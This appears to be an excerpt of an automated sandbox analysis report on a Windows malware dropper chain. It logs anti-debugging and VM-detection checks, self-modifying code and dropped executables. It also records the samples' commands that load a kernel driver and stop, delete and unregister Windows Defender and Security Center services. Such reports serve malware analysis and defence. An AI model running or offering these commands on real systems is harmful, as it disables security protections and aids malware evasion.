Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 898917 second address: 898926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 898926 second address: 898945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007FC3507E5376h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 898945 second address: 8989A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC350C3E718h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FC350C3E719h 0x00000027 jmp 00007FC350C3E71Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jnp 00007FC350C3E716h 0x00000035 jmp 00007FC350C3E728h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8989A9 second address: 8989DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007FC3507E538Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007FC3507E5380h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 8989DF second address: 8989FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Fh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 898C9B second address: 898CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 898CA1 second address: 898CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC350C3E716h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 899565 second address: 89956B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89956B second address: 89956F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89956F second address: 899585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov si, FEF0h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 899585 second address: 899598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 899A89 second address: 899AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89A009 second address: 89A00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89A744 second address: 89A748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89A748 second address: 89A74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89C3EC second address: 89C3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E537Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 89DD8C second address: 89DD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe Special instruction interceptor: First address: 50EB0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe Special instruction interceptor: First address: 6ADC6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe Special instruction interceptor: First address: 50EAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SUAosT64HD.exe Special instruction interceptor: First address: 7395EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 6EEB0F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 88DC6A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 6EEAC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 9195EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Special instruction interceptor: First address: 942047 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Special instruction interceptor: First address: 940858 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Special instruction interceptor: First address: 9D7FD4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: 4F2047 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: 4F0858 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: 587FD4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_055200F4 rdtsc 1_2_055200F4
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1333
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1694
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1177
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1104
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1085
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1179
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window / User API: threadDelayed 1145
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8336 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8336 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8308 Thread sleep count: 1333 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8308 Thread sleep time: -2667333s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8332 Thread sleep count: 274 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8332 Thread sleep time: -548274s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8296 Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8296 Thread sleep time: -5190000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8532 Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328 Thread sleep count: 1694 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328 Thread sleep time: -3389694s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8328 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8320 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8320 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 604 Thread sleep count: 1177 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 604 Thread sleep time: -2355177s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1652 Thread sleep count: 1104 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1652 Thread sleep time: -2209104s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1364 Thread sleep count: 1085 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1364 Thread sleep time: -2171085s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1156 Thread sleep count: 1179 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1156 Thread sleep time: -2359179s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1936 Thread sleep count: 213 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 1936 Thread sleep time: -6390000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3432 Thread sleep count: 1145 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3432 Thread sleep time: -2291145s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\22.exe TID: 4056 Thread sleep count: 332 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SUAosT64HD.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: rapes.exe, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, axplong.exe, 0000000A.00000002.1854681754.000000000086E000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: apple.exe, 0000000E.00000002.1931013800.0000000006DF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
Source: 22.exe, 00000013.00000002.2064569844.0000000000748000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW<
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWQ
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F72000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW H
Source: SUAosT64HD.exe, 00000001.00000002.1365221436.000000000068E000.00000040.00000001.01000000.00000004.sdmp, axplong.exe, 00000002.00000002.2561109533.000000000086E000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.1437821741.000000000086E000.00000040.00000001.01000000.00000007.sdmp, 3d9778a1ff.exe, 00000004.00000002.1486447124.000000000091D000.00000040.00000001.01000000.00000009.sdmp, rapes.exe, 00000007.00000002.1535218979.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, axplong.exe, 0000000A.00000002.1854681754.000000000086E000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SUAosT64HD.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\SUAosT64HD.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_055200F4 rdtsc 1_2_055200F4
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004D645B mov eax, dword ptr fs:[00000030h] 1_2_004D645B
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004DA1C2 mov eax, dword ptr fs:[00000030h] 1_2_004DA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006BA1C2 mov eax, dword ptr fs:[00000030h] 2_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006B645B mov eax, dword ptr fs:[00000030h] 2_2_006B645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006BA1C2 mov eax, dword ptr fs:[00000030h] 3_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_006B645B mov eax, dword ptr fs:[00000030h] 3_2_006B645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006BA1C2 mov eax, dword ptr fs:[00000030h] 10_2_006BA1C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_006B645B mov eax, dword ptr fs:[00000030h] 10_2_006B645B
Source: C:\Users\user\Desktop\SUAosT64HD.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
